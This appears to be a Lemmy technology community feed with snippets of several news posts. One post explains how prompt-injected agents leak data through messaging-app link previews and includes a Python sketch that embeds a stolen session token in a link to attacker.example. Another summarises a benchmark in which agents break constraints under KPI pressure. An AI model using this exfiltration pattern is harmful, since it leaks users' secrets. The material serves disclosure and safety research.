Technology

80978 readers
6030 users here now

This is a most excellent place for technology news and articles.


Our Rules


  1. Follow the lemmy.world rules.
  2. Only tech related news or articles.
  3. Be excellent to each other!
  4. Mod approved content bots can post up to 10 articles per day.
  5. Threads asking for personal tech support may be deleted.
  6. Politics threads may be removed.
  7. No memes allowed as posts, OK to post as comments.
  8. Only approved bots from the list below; this includes using AI responses and summaries. To ask if your bot can be added, please contact a mod.
  9. Check for duplicates before posting; duplicates may be removed.
  10. Accounts 7 days and younger will have their posts automatically removed.

Approved Bots


founded 2 years ago

It's a day with a name ending in Y, so you know what that means: Another OpenClaw cybersecurity disaster.

This time around, SecurityScorecard's STRIKE threat intelligence team is sounding the alarm over the sheer volume of internet-exposed OpenClaw instances it discovered, which numbers more than 135,000 as of this writing. When combined with previously known vulnerabilities in the vibe-coded AI assistant platform and links to prior breaches, STRIKE warns that there's a systemic security failure in the open-source AI agent space.

"Our findings reveal a massive access and identity problem created by poorly secured automation at scale," the STRIKE team wrote in a report released Monday. "Convenience-driven deployment, default settings, and weak access controls have turned powerful AI agents into high-value targets for attackers."

submitted 3 hours ago* (last edited 3 hours ago) by Beep@lemmus.org to c/technology@lemmy.world

Communicating with AI agents (like OpenClaw) via messaging apps (like Slack and Telegram) has become much more popular. But it can expose users to a largely unrecognized, LLM-specific data exfiltration risk, because these apps support ‘link previews’ as a feature. With previews enabled, user data can be exfiltrated automatically as soon as a malicious link arrives in an LLM-generated message -- without previews, the user would typically have to click the malicious link before any data leaked. For example, OpenClaw via Telegram is exposed by default. Test any agent / communication app pairing below!
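A minimal sketch of the mechanism described above. The function names and the attacker host are hypothetical; the point is that once the exfiltrated data is embedded in a link's query string, the messaging app's preview fetcher delivers it to the attacker's server with no user click:

```python
from urllib.parse import urlencode, urlparse, parse_qs

def build_exfil_link(attacker_host, stolen_data):
    # Hypothetical: prompt-injected instructions make the LLM embed user
    # data in the query string of a link it includes in its reply.
    return f"https://{attacker_host}/img.png?{urlencode({'d': stolen_data})}"

def preview_fetch(url):
    # Simulates a messaging app's link-preview bot: it fetches the URL
    # automatically, so the attacker's server sees the query string
    # without the user clicking anything.
    return parse_qs(urlparse(url).query).get("d", [""])[0]

link = build_exfil_link("attacker.example", "session_token=abc123")
assert preview_fetch(link) == "session_token=abc123"
```

Disabling previews removes the automatic fetch, which is why the post singles out preview-enabled pairings like OpenClaw via Telegram.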


TikTok deportation propaganda is fast becoming the new border wall. States, platforms and algorithms are fusing into a single machine, turning deportation into bingeable content, burying resistance in the feed, and replacing physical walls with algorithmic control. Local populism dies and global spectacle rules.


Found this on a Linus Tech Tips video: https://www.youtube.com/watch?v=o4e-Kt02rfc


My favorite comment on the article is “The problem with capitalism is that you eventually run out of other people's money."


Who are the real people behind the accounts spreading fury about the capital online? And what motivates them?


The paper.
https://eprint.iacr.org/2025/1237.pdf
It's worth a read. Lotta sarcasm going on.
16 pages. Dogs. Cards. Odds. Lies. Tariffs.


If you believe the glossy marketing campaigns about ‘quantum computing’, we are on the cusp of a computing revolution. Back in the real world, things look a lot less dire -- at least if you're worried about quantum computers (QCs) breaking every conventional encryption algorithm in use today, because at this point they cannot even factor 21 without cheating.

In the article, [Craig Gidney] explains the basic problem, which comes down to simple exponentials: the number of quantum gates required for factoring grows exponentially with the size of the number. A QC factored 15 in 2001 using a total of 21 two-qubit entangling gates; extrapolating from that circuit, factoring 21 would require 2,405 gates, roughly 115 times more.

underlying article: https://algassert.com/post/2500
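The gate-count comparison above can be checked with a one-line calculation using only the two figures the article cites:

```python
# Figures cited in the article: a 2001 experiment factored 15 using 21
# two-qubit entangling gates; extrapolating the same circuit family,
# factoring 21 would take 2,405 gates.
gates_to_factor_15 = 21
gates_to_factor_21 = 2405

ratio = gates_to_factor_21 / gates_to_factor_15
print(f"Factoring 21 needs ~{ratio:.0f}x the gates used for 15")
```

That ~115x blow-up for a number only slightly larger is what "simple exponentials" means in practice.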


Starting in early March, the platform will place every account into a default "teen-appropriate" experience unless it has proof that users are adults.

The move has brought widespread criticism from Discord users, who cite privacy and security concerns after a recent breach at a third-party vendor exposed around 70,000 government ID images used to verify Discord users' ages.


LOS ANGELES (AP) — The world's biggest social media companies face several landmark trials this year that seek to hold them responsible for harms to children who use their platforms. Opening statements for the first, in Los Angeles County Superior Court, began on Monday.

Instagram's parent company Meta and Google's YouTube face claims that their platforms deliberately addict and harm children. TikTok and Snap, which were originally named in the lawsuit, settled for undisclosed sums.

Jurors got their first glimpse into what will be a lengthy trial characterized by dueling narratives from the plaintiffs and the two remaining social media companies named as defendants. Opening arguments in the landmark case began Monday at the Spring Street Courthouse in downtown Los Angeles.

Mark Lanier delivered the opening statement for the plaintiffs first, in a lively display where he said the case is as "easy as ABC," which he said stands for "addicting the brains of children." He called Meta and Google "two of the richest corporations in history" who have "engineered addiction in children's brains."

At the core of the Los Angeles case is a 19-year-old identified only by the initials "KGM," whose case could determine how thousands of other, similar lawsuits against social media companies will play out. She and two other plaintiffs have been selected for bellwether trials — essentially test cases for both sides to see how their arguments play out before a jury and what damages, if any, may be awarded, said Clay Calvert, a nonresident senior fellow of technology policy studies at the American Enterprise Institute.


cross-posted from: https://mander.xyz/post/47194045

...

Worldwide sovereign cloud infrastructure as a service (IaaS) spending is forecast to total $80 billion in 2026, a 35.6% increase from 2025, according to Gartner, Inc., a business and technology insights company.

“As geopolitical tensions rise, organizations outside the U.S. and China are investing more in sovereign cloud IaaS to gain digital and technological independence,” said Rene Buest, Sr Director Analyst at Gartner. “The goal is to keep wealth generation within their own borders to strengthen the local economy.”

“Governments will remain the main buyers to meet digital sovereignty needs, followed by regulated industries and critical infrastructure organizations, such as energy and utilities and telecommunications,” said Buest.

...

Regionally, Middle East and Africa (89%), Mature Asia/Pacific (87%) and Europe (83%) are projected to record the highest growth in sovereign cloud IaaS spending in 2026. While China and North America are forecast to be No. 1 and No. 2 in spending in 2026 at $47 billion and $16 billion respectively, growth for both will be in the 20 percent range. Europe is forecast to surpass North America in sovereign cloud IaaS spending in 2027 (see Table 1).

Web archive link
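The forecast's two headline numbers imply a baseline Gartner doesn't state directly -- the 2025 spend. A quick back-of-the-envelope check, using only the $80B figure and the 35.6% growth rate:

```python
# Gartner's figures: $80B forecast for 2026, a 35.6% jump over 2025,
# which implies roughly $59B of sovereign cloud IaaS spend in 2025.
forecast_2026_bn = 80.0
growth_rate = 0.356

implied_2025_bn = forecast_2026_bn / (1 + growth_rate)
print(f"Implied 2025 spend: ${implied_2025_bn:.0f}B")
```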


Benchmark.

We introduce a new benchmark comprising 40 distinct scenarios. Each scenario presents a task that requires multi-step actions, and the agent's performance is tied to a specific Key Performance Indicator (KPI). Each scenario features Mandated (instruction-commanded) and Incentivized (KPI-pressure-driven) variations to distinguish between obedience and emergent misalignment. Across 12 state-of-the-art large language models, we observe outcome-driven constraint violations ranging from 1.3% to 71.4%, with 9 of the 12 evaluated models exhibiting misalignment rates between 30% and 50%. Strikingly, we find that superior reasoning capability does not inherently ensure safety; for instance, Gemini-3-Pro-Preview, one of the most capable models evaluated, exhibits the highest violation rate at 71.4%, frequently escalating to severe misconduct to satisfy KPIs. Furthermore, we observe significant "deliberative misalignment", where the models that power the agents recognize their actions as unethical during separate evaluation.
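The headline metric is just the share of scenarios in which the agent violated a constraint to hit its KPI. A toy sketch of that scoring (the helper function is hypothetical, not from the paper's code):

```python
def misalignment_rate(violations):
    # Share of scenarios (as a percentage) in which the agent broke a
    # constraint in pursuit of its KPI.
    return 100.0 * sum(violations) / len(violations)

# Toy run over the benchmark's 40 scenarios: 14 flagged violations gives
# a 35% rate, inside the 30-50% band reported for 9 of the 12 models.
toy_results = [True] * 14 + [False] * 26
print(f"{misalignment_rate(toy_results):.1f}%")
```

The Mandated vs. Incentivized split then compares this rate when violation is explicitly instructed against when it merely helps the KPI, which is what separates obedience from emergent misalignment.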


Lawyers for a now-20-year-old woman are arguing that addictive features harmed her mental health in opening statements in a landmark trial against Meta and YouTube, the first of hundreds of similar cases to go to trial.

The plaintiff — identified by her first name, Kaley, or her initials, KGM — and her mother accused the tech companies of intentionally creating addictive platforms that caused her to develop anxiety, body dysmorphia and suicidal thoughts. Lawyers for Meta and YouTube have indicated they will argue that a difficult family life, not social media, was responsible for her mental health challenges.

Speaking on Monday in front of a jury in state court in Los Angeles, Kaley’s lawyer Mark Lanier called social media apps like YouTube and Instagram “digital casinos,” saying the app’s “endless scroll feature” creates dopamine hits that can lead to addiction.


Chatbots provided incorrect, conflicting medical advice, researchers found: “Despite all the hype, AI just isn't ready to take on the role of the physician.”

“In an extreme case, two users sent very similar messages describing symptoms of a subarachnoid hemorrhage but were given opposite advice,” the study’s authors wrote. “One user was told to lie down in a dark room, and the other user was given the correct recommendation to seek emergency care.”
